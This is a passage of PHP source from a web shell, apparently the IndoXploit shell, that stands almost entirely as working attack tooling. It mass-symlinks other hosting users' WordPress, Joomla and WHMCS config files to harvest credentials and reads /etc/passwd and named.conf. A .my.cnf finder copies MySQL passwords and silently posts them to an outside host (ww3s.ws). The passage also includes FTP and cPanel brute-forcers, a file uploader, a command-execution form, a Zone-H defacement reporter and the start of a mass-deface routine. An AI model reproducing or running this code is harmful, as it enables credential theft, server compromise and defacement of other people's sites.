3563. @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3564. @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3565. @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3566. @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3567. @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3568. @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3569. @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3570. @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3571. @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3572. @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3573. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3574. @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3575. @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3576. @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3577. @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3578. @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3579. @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3580. @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3581. @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3582. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3583. @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3584. @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3585. @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3586. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3587. @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3588. @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3589. @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3590. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3591. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3592. @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3593. @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt');
3594. @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3595. @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3596. @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3597. @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3598. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3599. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3600. @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3601. @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3602. @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3603. @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3604. @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3605. @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3606. @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3607. @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3608. @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt');
3609. @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3610. @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3611. @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3612. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3613. @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3614. @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3615. @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3616. @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3617. @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3618. @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3619. @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3620. @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3621. @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3622. @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3623. @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3624. @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3625. @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3626. @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3627. @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3628. @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3629. @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3630. @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3631. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3632. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt');
3633. @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3634. @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3635. @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3636. @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3637. @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3638. @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3639. @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3640. @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3641. @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3642. @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3643. @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3644. @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3645. @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3646. @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3647. @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3648. @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3649. @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3650. @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3651. @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3652. @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3653. @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3654. @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3655. @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3656. @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3657. @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3658. @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3659. @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3660. @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3661. @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3662. @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3663. @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3664. @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3665. @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3666. @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3667. @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3668. @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3669. @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3670. @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3671. @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3672. @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3673. @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3674. @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3675. @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3676. @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3677. @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3678. @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3679. @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3680. @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3681. @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3682. @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3683. @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3684. @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3685. @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3686. @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3687. @symlink('/', 'btmgrab/root');
3688. }
3689. echo "<center><a href='btmgrab/root' target='_blank'><h1>Root</h1></a><br>
3690. <br>
3691. <center><a href='btmgrab' target='_blank'><h1>Configurations</h1></a><br>";
3692. echo "<title> Domains & Users</title>
3693.  
3694.  
3695. <p align=center> Domains & Users</p>
3696.  
3697. <center>";
3698. $d0mains = @file("/etc/named.conf");
3699. if (!$d0mains) {
3700. die("<b> can't Read /etc/named.conf<br><br><br> Done");
3701. }
3702. echo "<table align=center border=1>
3703.  
3704. <tr bgcolor=green><td>DOMAINS</td><td>USERs</td></tr>";
3705. foreach ($d0mains as $d0main) {
3706. if (eregi("zone", $d0main)) {
3707. preg_match_all('#zone "(.*)"#', $d0main, $domains);
3708. flush();
3709. if (strlen(trim($domains[1][0])) > 2) {
3710. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
3711. echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
3712. flush();
3713. }
3714. }
3715. }
3716. echo "</table>
3717.  
3718. <p align='center'>
3719.  
3720. </p>
3721.  
3722. ";
3723. echo "<center>Done<br><br/>";
3724. } else {
3725. echo '<center>
3726. <form method="POST">
3727. <textarea name="passwd" style="width: 543px; height: 420px; background-color:transparent; font-family:Tahoma; font-size:8pt; ">';
3728. flush();
3729. $file = '/etc/passwd';
3730. $read = @fopen($file, 'r');
3731. if ($read) {
3732. $body = @fread($read, @filesize($file));
3733. echo "" . htmlentities($body) . "";
3734. } elseif (!$read) {
3735. $read = @show_source($file);
3736. } elseif (!$read) {
3737. $read = @highlight_file($file);
3738. } elseif (!$read) {
3739. for ($uid = 0;$uid < 1000;$uid++) {
3740. $ara = posix_getpwuid($uid);
3741. if (!empty($ara)) {
3742. while (list($key, $val) = each($ara)) {
3743. print "$val:";
3744. }
3745. print "
3746. ";
3747. }
3748. }
3749. }
3750. flush();
3751. echo '</textarea></br>
3752. <p>&nbsp;</p><center>
3753. <input name="m" size="80" value="Hajar" type="submit" style="width: 99; font-family:Tahoma; font-size:10pt;; text-transform:uppercase; height:23; background-color:#transparent"/></br>
3754. </form>
3755. ';
3756. }
3757.  
3758. }
3759. elseif($_GET['do'] == 'poster') {
3760. echo "<center>";
3761. echo "<ul>";
3762. echo "<li> <a href='?dir=$dir&do=defid'>Defacer-ID</a> </li>";
3763. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
3764. echo "</ul>";
3765. echo "</center>";
3766. }
3767. elseif($_GET['do'] == 'zoneh') {
3768. echo "<center>";
3769. echo "<ul>";
3770. echo "<li> <a href='?dir=$dir&do=defid'>Defacer-ID</a> </li>";
3771. echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
3772. echo "</ul>";
3773. echo "</center>";
3774. if($_POST['submit']) {
3775. $domain = explode("\r\n", $_POST['url']);
3776. $nick = $_POST['nick'];
3777. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3778. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3779. function zoneh($url,$nick) {
3780. $ch = curl_init("http://www.zone-h.com/notify/single");
3781. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3782. curl_setopt($ch, CURLOPT_POST, true);
3783. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3784. return curl_exec($ch);
3785. curl_close($ch);
3786. }
3787. foreach($domain as $url) {
3788. $zoneh = zoneh($url,$nick);
3789. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3790. echo "$url -> <font color=lime>OK</font><br>";
3791. } else {
3792. echo "$url -> <font color=red>ERROR</font><br>";
3793. }
3794. }
3795. } else {
3796. echo "<center><form method='post'>
3797. <font style='text-decoration: underline;'>Zone-H Poster :</font><br>
3798. <u>Defacer</u>: <br>
3799. <input type='text' name='nick' size='50' value='Jingklong'><br>
3800. <u>Domains</u>: <br>
3801. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3802. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3803. </form>";
3804. }
3805. echo "</center>";
3806. }
3807. elseif($_GET['do'] == 'upload') {
3808. echo "<center>";
3809. if($_POST['upload']) {
3810. if($_POST['tipe_upload'] == 'biasa') {
3811. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
3812. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
3813. } else {
3814. $act = "<font color=red>failed to upload file</font>";
3815. }
3816. } else {
3817. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
3818. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
3819. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
3820. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
3821. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
3822. } else {
3823. $act = "<font color=red>failed to upload file</font>";
3824. }
3825. } else {
3826. $act = "<font color=red>failed to upload file</font>";
3827. }
3828. }
3829. }
3830. echo "Upload File:
3831. <form method='post' enctype='multipart/form-data'>
3832. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
3833. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
3834. <input type='file' name='ix_file'>
3835. <input type='submit' value='upload' name='upload'>
3836. </form>";
3837. echo $act;
3838. echo "</center>";
3839. }
3840. elseif($_GET['do'] == 'brut') {
3841. echo "<center>";
3842. echo "<ul>";
3843. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
3844. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
3845. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
3846. echo "</ul>";
3847. echo "</center>";
3848. }
3849. elseif($_GET['do'] == 'hunt') {
3850. echo "<center>";
3851. echo "<ul>";
3852. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
3853. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
3854. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
3855. echo "</ul>";
3856. echo "</center>";
3857.  
3858. echo "<center>";
3859. $d0mains = @file('/etc/named.conf');
3860. $domains = scandir("/var/named");
3861.  
3862. if ($domains or $d0mains)
3863. {
3864. $domains = scandir("/var/named");
3865. if($domains) {
3866. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
3867. $count=1;
3868. $dc = 0;
3869. $list = scandir("/var/named");
3870. foreach($list as $domain){
3871. if(strpos($domain,".db")){
3872. $domain = str_replace('.db','',$domain);
3873. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
3874. $dirz = '/home/'.$owner['name'].'/.my.cnf';
3875. $path = getcwd();
3876.  
3877. if (is_readable($dirz)) {
3878. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
3879. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
3880. $password=entre2v2($p,'password="','"');
3881. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
3882. $dc++;
3883. $success="http://".$domain."|".$owner['name']."|".$password."\n";
3884. $ch = curl_init();
3885. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
3886. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
3887. curl_setopt($ch, CURLOPT_POST, 1);
3888. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success));
3889. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3890. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3891. curl_setopt($ch, CURLOPT_HEADER, 1);
3892. $buffer = curl_exec($ch);
3893. }
3894.  
3895. }
3896. }
3897. echo '</table>';
3898. $total = $dc;
3899. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
3900. echo '</center>';
3901. }else{
3902. $d0mains = @file('/etc/named.conf');
3903. if($d0mains) {
3904. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
3905. $count=1;
3906. $dc = 0;
3907. $mck = array();
3908. foreach($d0mains as $d0main){
3909. if(@eregi('zone',$d0main)){
3910. preg_match_all('#zone "(.*)"#',$d0main,$domain);
3911. flush();
3912. if(strlen(trim($domain[1][0])) >2){
3913. $mck[] = $domain[1][0];
3914. }
3915. }
3916. }
3917. $mck = array_unique($mck);
3918. $usr = array();
3919. $dmn = array();
3920. foreach($mck as $o) {
3921. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
3922. $usr[] = $infos['name'];
3923. $dmn[] = $o;
3924. }
3925. array_multisort($usr,$dmn);
3926. $dt = file('/etc/passwd');
3927. $passwd = array();
3928. foreach($dt as $d) {
3929. $r = explode(':',$d);
3930. if(strpos($r[5],'home')) {
3931. $passwd[$r[0]] = $r[5];
3932. }
3933. }
3934. $l=0;
3935. $j=1;
3936. foreach($usr as $r) {
3937. $dirz = '/home/'.$r.'/.my.cnf';
3938. $path = getcwd();
3939. if (is_readable($dirz)) {
3940. copy($dirz, ''.$path.'/'.$r.'.txt');
3941. $p=file_get_contents(''.$path.'/'.$r.'.txt');
3942. $password=entre2v2($p,'password="','"');
3943. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
3944. $dc++;
3945. flush();
3946. $l=$l?0:1;
3947. $j++;
3948. }
3949. }
3950. }
3951. echo '</table>';
3952. $total = $dc;
3953. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
3954. echo '</center>';
3955.  
3956. }
3957. }else{
3958. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
3959. }
3960.  
3961. echo "</body></html>";
3962. }
3963. elseif($_GET['do'] == 'ftpb') {
3964. echo "<center>";
3965. echo "<ul>";
3966. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
3967. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
3968. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
3969. echo "</ul>";
3970. echo "</center>";
3971. echo "
3972. <p align='center' dir='ltr'><font face='Tahoma' size='4'>[#] FTP Brute Force [#]</font></p>
3973. <form method='POST'>
3974. <center>
3975. <p dir='ltr'>
3976. <textarea style='width: 450px; height: 150px;' cols='30' rows='10' name='username' placeholder='username List'></textarea>
3977. <textarea style='width: 450px; height: 150px;' cols='30' rows='10' name='password' placeholder='Password List'></textarea></p>
3978. <input type='text' name='ip' value='127.0.0.1'>
3979. <input type='submit' value='BruteFTP' name='start'><br>
3980. <p><font face='Verdana' size='1'>[+] ReSulT [+]</font></p>
3981. </form>";
3982. @set_time_limit(0);
3983. $ip = $_POST['ip'];
3984. $username = explode("\n",$_POST['username']);
3985. $password = explode("\n",$_POST['password']);
3986.  
3987. if($_POST['start']) {
3988. function brute($connect,$ip,$user,$pass)
3989. {
3990. $connect = ftp_connect($ip) or die("Error , Maybe you were Banned From Server");
3991. if(ftp_login($connect, $user, $pass)) {
3992. echo "<p dir='ltr'><font face='Tahoma' size='2'>Cracked :
3993. <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>"; }
3994. }
3995.  
3996. foreach($username as $user) {
3997. foreach($password as $pass) {
3998. brute($connect,$ip,$user,$pass);
3999. } }
4000. }
4001. echo "<p><font face='Verdana' size='1'>
4002. +------------------------------------------------------------------------------------------------------------+</font></p>
4003. </form>";
4004.  
4005. }
4006. elseif($_GET['do'] == 'cpc') {
4007. echo "<center>";
4008. echo "<ul>";
4009. echo "<li> <a href='?dir=$dir&do=cpc'>cPanel Bruteforce</a> </li>";
4010. echo "<li> <a href='?dir=$dir&do=ftpb'>FTP Bruteforce</a> </li>";
4011. echo "<li> <a href='?dir=$dir&do=hunt'>.my.cnf Finder</a> </li>";
4012. echo "</ul>";
4013. echo "</center>";
4014. if($_POST['crack']) {
4015. $usercp = explode("\r\n", $_POST['user_cp']);
4016. $passcp = explode("\r\n", $_POST['pass_cp']);
4017. $i = 0;
4018. foreach($usercp as $ucp) {
4019. foreach($passcp as $pcp) {
4020. if(@mysql_connect('localhost', $ucp, $pcp)) {
4021. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
4022. } else {
4023. $_SESSION[$ucp] = "1";
4024. $_SESSION[$pcp] = "1";
4025. if($ucp == '' || $pcp == '') {
4026.  
4027. } else {
4028. $i++;
4029. if(function_exists('posix_getpwuid')) {
4030. $domain_cp = file_get_contents("/etc/named.conf");
4031. if($domain_cp == '') {
4032. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
4033. } else {
4034. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
4035. foreach($domains_cp[1] as $dj) {
4036. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
4037. $user_cp_url = $user_cp_url['name'];
4038. if($user_cp_url == $ucp) {
4039. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
4040. break;
4041. }
4042. }
4043. }
4044. } else {
4045. $dom = "<font color=red>function is Disable by system</font>";
4046. }
4047. echo "<font color=lime>$ucp</font> | <font color=lime>$pcp</font> | http://$dom:2082<br>";
4048. }
4049. }
4050. }
4051. }
4052. }
4053. if($i == 0) {
4054. } else {
4055. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
4056. }
4057. } else {
4058. echo "<center>
4059. <p align='center' dir='ltr'><font face='Tahoma' size='4'>[#] cPanel Brute Force [#]</font></p>
4060. <form method='post'>
4061. <textarea style='width: 450px; height: 150px;' name='user_cp' placeholder='User List'>";
4062. $_usercp = fopen("/etc/passwd","r");
4063. while($getu = fgets($_usercp)) {
4064. if($getu == '' || !$_usercp) {
4065. echo "<font color=red>Can't read /etc/passwd</font>";
4066. } else {
4067. preg_match_all("/(.*?):x:/", $getu, $u);
4068. foreach($u[1] as $user_cp) {
4069. if(is_dir("/home/$user_cp/public_html")) {
4070. echo "$user_cp\n";
4071. }
4072. }
4073. }
4074. }
4075. echo "</textarea>
4076. <textarea style='width: 450px; height: 150px;' name='pass_cp' placeholder='Password list'>";
4077. function cp_pass($dir) {
4078. $pass = "";
4079. $dira = scandir($dir);
4080. foreach($dira as $dirb) {
4081. if(!is_file("$dir/$dirb")) continue;
4082. $ambil = file_get_contents("$dir/$dirb");
4083. if(preg_match("/WordPress/", $ambil)) {
4084. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
4085. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
4086. $pass .= ambilkata($ambil,"password = '","'")."\n";
4087. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
4088. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
4089. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
4090. $pass .= ambilkata($ambil,'password = "','"')."\n";
4091. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
4092. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
4093. } elseif(preg_match("/^[client]$/", $ambil)) {
4094. preg_match("/password=(.*?)/", $ambil, $pass1);
4095. if(preg_match('/"/', $pass1[1])) {
4096. $pass1[1] = str_replace('"', "", $pass1[1]);
4097. $pass .= $pass1[1]."\n";
4098. } else {
4099. $pass .= $pass1[1]."\n";
4100. }
4101. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
4102. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
4103. }
4104. }
4105. echo $pass;
4106. }
4107. $cp_pass = cp_pass($dir);
4108. echo $cp_pass;
4109. echo "</textarea><br>
4110. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
4111. </form>
4112. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
4113. }
4114. }
4115. elseif($_GET['do'] == 'cmd') {
4116. echo "<form method='post'>
4117. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
4118. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
4119. </form>";
4120. if($_POST['do_cmd']) {
4121. echo "<pre>".exe($_POST['cmd'])."</pre>";
4122. }
4123. }
4124. elseif($_GET['do'] == 'mass_deface') {
4125. function sabun_massal($dir,$namafile,$isi_script) {
4126. if(is_writable($dir)) {
